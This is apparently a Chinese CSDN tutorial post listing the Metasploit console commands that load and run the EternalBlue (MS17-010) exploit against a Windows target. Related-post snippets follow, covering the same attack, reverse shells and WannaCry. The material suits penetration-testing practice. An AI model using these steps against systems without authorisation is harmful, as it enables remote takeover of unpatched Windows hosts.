kali渗透工具 - metasploit的使用。依靠永恒之蓝漏洞

熊熊危机

已于 2023-06-28 13:11:20 修改

阅读量114

点赞数

文章标签： linux 运维服务器

于 2023-06-27 16:55:29 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_63554184/article/details/131420703

版权

本文介绍了如何进入root权限，使用sudo和su命令，然后通过msfconsole搜索并选择ms17_010（永恒之蓝）模块来攻击目标机器。关键步骤包括设置目标IP地址，配置选项并运行攻击模块。同时，展示了查询可用命令的help功能。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

进入root管理级别

sudo su

进入工具

msfconsole

搜索永恒之蓝的模块，显示每个模块用来干什么

search ms17_010

选择一个所需要的模块，这选择第一个模块用来攻击

use 0

找到所需要配置的内容，为攻击做准备

show options

发现，需要设置目标机器ip地址

set RHOSTS 192.1111.1111.11

启动

run

显示所有可执行的命令

help

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

熊熊危机

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Kali--永恒之蓝漏洞复现

f1245179815的博客

10-24

1147

该模块用于发现被漏洞影响的 Windows主机，以及执行命令，可以通过提供的选项进行数据包分析，或可选通道溢出使用，以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机，以及执行命令，可以通过提供的选项进行数据包分析，或可选通道溢出使用，以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码，可以覆盖掉目标计算机的内存地址，从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机，程序后台运行，且监听端口为7777，这个端口可以自己设置。

kali最强渗透工具 - metasploit

m0_59356888的博客

05-19

780

payload中的LHOST为监听地址，是本地接口，也就是kali的IP地址，在这里可以看kali的IP地址，通过ifconfig查看,看里面的eth0（这里就是以太网的意思），我的是192.168.144.1，跟show options看到的一样就无需配置。再次show options查看，全部配置完全后，运行：run，即可对目标主机进行攻击。此网站里面有操作系统，绿色，没有任何捆绑软件，2017年之前都有永恒之蓝漏洞，我们只需要选择一个17年之前的版本，比如win7操作系统，推荐下载64位的操作系统。

1 条评论您还未登录，请先登录后发表或查看评论

Kali渗透工具-Metasploit攻击windows（永恒之蓝）全流程

Mrsbroken的博客

10-16

1901

使用模块 ->配置模块必选项 ->运行模块使用命令 msfconsole 打开msf使用命令搜索永恒之蓝的编号（ms17_010）这是一个漏洞利用模块，用于远程执行代码。它利用了 MS17-010 漏洞，该漏洞存在于 Windows SMB 服务中，允许攻击者在未授权的情况下远程执行代码。这个模块通常用于渗透测试和安全评估，以检测和利用目标系统的漏洞。这也是一个利用 MS17-010 漏洞的模块，但主要用于在目标系统上执行进程。

渗透测试工具-Metasploit使用复现永恒之蓝漏洞

weixin_53440207的博客

02-23

1200

metasploit使用以及复现永恒之蓝漏洞

网络渗透系列（三）Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程（全程干货、火爆连载更新中...）

Midheart1的博客

12-29

958

永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞，有很多业界大佬纷纷提出过这个事情，所以永恒之蓝这个经典案例依然值得学习和深入开发。

网络渗透系列（二）Kali最强渗透工具- metasploit以及Windows永恒之蓝漏洞（全程干货、火爆连载更新中...）

Midheart1的博客

12-28

547

基于永恒之蓝漏洞的wannacry勒索病毒使得中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

Kali最强渗透工具-metasploit

翊予山川的博客

12-13

1509

永恒之蓝是指2017年4月14日晚，黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。metasploit让复杂的漏洞攻击流程变的非常简单，一个电脑小白经过几小时的学习，就能对操作系统等主流漏洞发起危害性攻击。msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。metasploit 攻击 windows 操作系统。

msf渗透测试学习-与永恒之蓝漏洞案例

weixin_49349476的博客

06-08

5314

MSF是Metasploit Framework的缩写，是一款广泛使用的渗透测试工具，具有强大的攻击功能。它提供了一个模块化的平台，通过将各种攻击载荷、漏洞利用和辅助工具组装在一起，可用于模拟各种攻击，测试系统安全性，也可以用于执行红队实战训练、漏洞挖掘等工作。

kalilinux - msf和永恒之蓝漏洞

weixin_74923758的博客

01-13

438

永恒之蓝是指2017年4月14日晚，黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。如果是想自己练习的话，一定要知道一个网站MSDN，它是windows默认的镜像下载站，这里面的操作系统都是纯净原生的，不会有任何的补丁或者捆绑软件。msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的sheelcode，并持续保持更新。这个的意思是得到目标受害者机的后渗透的权限。

kali利用ms17-010永恒之蓝漏洞入侵windows7

03-29

1.先在kali中启动metasploit工具，终端输入msfconsole。 2.搜索永恒之蓝漏洞利用模块，输入"search ms17-010" ...kali虚拟机，安装了msfconsole、windows7，未打永恒之蓝漏洞补丁。希望能对大家有所帮助

通过Metasploit实现MS17-010（永恒之蓝漏洞）的复现学习

Time_worm的博客

07-14

1355

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

kali渗透测试——渗透攻击（基础+攻击永恒之蓝操作系统）

2302_80189643的博客

05-29

465

使用auxiliary/scanner/smb/smb_ms17_010模块加载检测，set rhosts设置目标主机，run执行，search搜索ms17_010漏洞的渗透模块。使用编号为0的模块，加上use启动模块，然后使用show options命令查看这个模块需要设置的参数。（4）Check是检查，表示该漏洞利用模块是否包含检测功能，用于验证目标系统是否存在该漏洞。（5）Description是描述，对漏洞利用模块的功能、目标、影响等信息简要描述。（2）模块命令(Module Command)

【Linux】Linux 环境变量

Antonio915的博客

06-04

1039

每个程序都会收到一张环境表，环境表是一个字符指针数组，每个指针指向一个以’\0’结尾的环境字符串。

19-项目部署(Linux)

2301_80368429的博客

06-03

1426

不同领域的主流操作系统，主要分为以下这么几类：桌面操作系统、服务器操作系统、移动设备操作系统、嵌入式操作系统。接下来，这几个领域中，代表性的操作系统是那些?1). 桌面操作系统操作系统特点Windows用户数量最多MacOS操作体验好，办公人士首选Linux用户数量少(桌面操作系统,Linux使用较少)2). 服务器操作系统操作系统特点Unix安全、稳定、付费Linux安全、稳定、免费、占有率高付费、占有率低3). 移动设备操作系统操作系统特点Android。

从零开始打造 OpenSTLinux 6.6 Yocto 系统（基于STM32CubeMX）（十二）

最新发布

小柯的博客

06-08

140

本文介绍了YT8511网络驱动在Linux内核中的修改方法。针对使用ST官方YT8511驱动时出现的根文件系统网络问题，需要替换两个关键文件：将motorcomm.c替换到drivers/net/phy/目录，motorcomm_phy.h替换到include/linux/目录。文档详细提供了内核重新编译的完整命令流程，包括配置合并、镜像生成、模块安装和设备树复制等步骤。最后给出了通过NFS启动的bootargs环境变量设置示例，并附带了操作过程截图。该解决方案可确保系统正常使用nfsroot启动网络功能。

Linux 中替换文件中的某个字符串

刘皇叔说Java的博客

06-06

583

或其他特殊字符，可以改用。如果你想在 Linux 中。：仅在第 5 行替换。

操作系统中的设备管理，Linux下的I/O

m0_74985290的博客

06-05

1201

其中，设备独立性软件、设备驱动程序、中断处理程序属于操作系统的内核部分，即“I/O 系统”，或称“I/O 核心子系统”。

[Linux] MySQL源码编译安装

qq_53232485的博客

06-03

958

本文详细介绍了MySQL 5.7.20源码编译安装过程。主要内容包括：环境包安装（需cmake等工具）、创建mysql系统用户、解压源码包、使用cmake配置编译参数（指定安装路径、字符集等）、多核编译（make -j4）、安装后的权限配置（chown）、修改my.cnf配置文件、设置系统环境变量、初始化数据库以及通过systemd管理MySQL服务。重点强调了采用cmake编译方式，并提供了完整的编译参数和配置模板。

Linux nano命令的基本使用

菜鸟记录

06-08

644

⏹Linux nano命令的基本使用

利用Metasploit的永恒之蓝漏洞渗透win10

05-02

在使用Metasploit渗透测试工具之前，需要先了解一些基础知识。永恒之蓝漏洞是一个远程代码执行漏洞，它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过网络获取Windows系统的控制权，而无需进行身份验证。以下是使用Metasploit进行永恒之蓝漏洞渗透win10的步骤： 1. 首先，需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描工具进行扫描。 2. 打开Kali Linux终端，输入msfconsole命令打开Metasploit控制台。 3. 在Metasploit控制台中输入search eternalblue，选择对应的exploit模块进行利用。 4. 设置目标机器的IP地址，以及目标机器的操作系统版本。 5. 输入run命令开始攻击，Metasploit会自动进行漏洞利用尝试。 6. 如果攻击成功，将会得到一个反向Shell，可以使用该Shell进行后续操作。需要注意的是，永恒之蓝漏洞是一个非常危险的漏洞，使用Metasploit进行渗透测试时需要遵守相关法律法规，以及遵守渗透测试的道德规范。建议只在合法授权的情况下使用Metasploit进行渗透测试。